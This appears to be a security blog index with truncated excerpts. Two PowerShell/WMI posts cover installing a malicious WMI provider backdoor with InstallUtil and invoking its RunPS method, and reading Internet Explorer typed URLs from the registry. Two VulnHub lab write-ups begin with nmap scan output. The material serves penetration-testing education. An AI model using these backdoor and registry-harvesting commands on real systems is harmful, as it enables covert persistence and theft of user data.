Powershell * WMI

Backdoor with WMI

Win32 localadmins provider: One of the earlier poc evil WMI provider: https://github.com/rzander/localadmins Evil Network connection WMI Provider: https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug): C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll On another ps: Here we can see win32_netconnection in output. PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list PS C:\Users\victim6\Downloads>  Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList…

Vulnerable Machine Writeup * VULNHUB

HA AVENGERS ARSENAL (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.48.133 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 09:39 GMT Nmap scan report for 192.168.48.133 Host is up (0.00029s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-git: | 192.168.48.133:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this…

Powershell * WMI

Windows Registry with WMI

PS C:\> Get-WmiObject -Namespace root\default -Class stdregprov –list PS C:\> Get-WmiObject -Namespace root\default -Class stdregprov -list | select -ExpandProperty methods PS C:\> $regprov = Get-WmiObject -Namespace root\default -Class stdregprov –list PS C:\> $regprov.methods Retrieving Internet Explorer Typed URLs: PS C:\> Invoke-WmiMethod -namespace root\default -class stdregprov -name Enumkey @(2147483649,”software\microsoft\internet explorer”) | select -ExcludeProperty snames PS C:\>…

Vulnerable Machine Writeup * VULNHUB

HA RUDRA (VULNHUB)

root@kali:~# nmap -A 192.168.48.132 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 17:48 GMT Nmap scan report for 192.168.48.132 Host is up (0.00038s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA) | 256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA) |_…